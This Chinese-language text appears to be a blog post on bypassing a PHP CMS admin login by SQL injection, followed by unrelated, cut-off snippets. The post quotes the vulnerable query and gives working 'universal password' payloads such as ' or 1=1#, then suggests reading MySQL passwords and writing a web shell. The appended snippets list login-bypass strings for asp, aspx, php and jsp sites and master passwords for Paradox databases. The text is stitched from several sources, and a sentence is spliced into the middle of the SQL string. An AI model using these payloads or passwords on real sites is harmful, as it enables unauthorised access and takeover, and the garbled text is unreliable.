檔案爬了一下
發現如下
如此一來,輕鬆的多啦。
看308行
$sql="select根據此sql構造萬能密碼。*from cms_users where cms_username=
'$username
'and cms_userpass=
'$password
'";
當$username=' or '1'='1 /*
$password=hello world*/
時候該sql語句就為:"select * from cms_users where cms_username='1' or '1'='1/*and cms_userpass='hello world*/'";
"select * from cms_users where cms_username='1' or '1'='1/* and cms_userpass='hello world*/'";
"select * from cms_users where cms_username='1' or '1'='1'";
其實有一招,不知道大家想到木有。
$username=' or 1=1#
直接完美注釋後面的語句。$password可以隨便輸入。
上面的是乙個姿勢,其實還有乙個姿勢同樣可以拿下.
原始碼拿到了,有mysql密碼了.可以外聯,直接讀取密碼.找到可讀寫直接寫shell
萬能密碼 php,PHP萬能密碼
說實話如果乙個 的前台都是注入漏洞,那麼憑經驗,萬能密碼進後台的機率基本上是百分之百。可是有的人說對php的站如果是gpc魔術轉換開啟,就會對特殊符號轉義,就徹底杜絕了php注入。其實說這話的人沒有好好想過,更沒有嘗試過用萬能密碼進php的後台。其實gpc魔術轉換是否開啟對用萬能密碼進後台一點影響也...
asp aspx php jsp萬能密碼
asp aspx萬能密碼 1 or a a 2 or a a 3 or 1 1 4 or 1 1 5 a or 1 1 6 or 1 1 7 or a a 8 or a a 9 or 10 or or 11 1 or 1 1 1 12 1 or 1 1 or 1 1 13 or 1 1 00 14 ...
PARADOX DB 萬能密碼
paradox資料庫的萬能密碼 如果是paradox,請用此萬能密碼 jiggae 還有 nx66ppx 注意大小寫 version password paradox 7 jiggae or cupcdvum paradox 5 jiggae or cupcdvum paradox 4 nx66pp...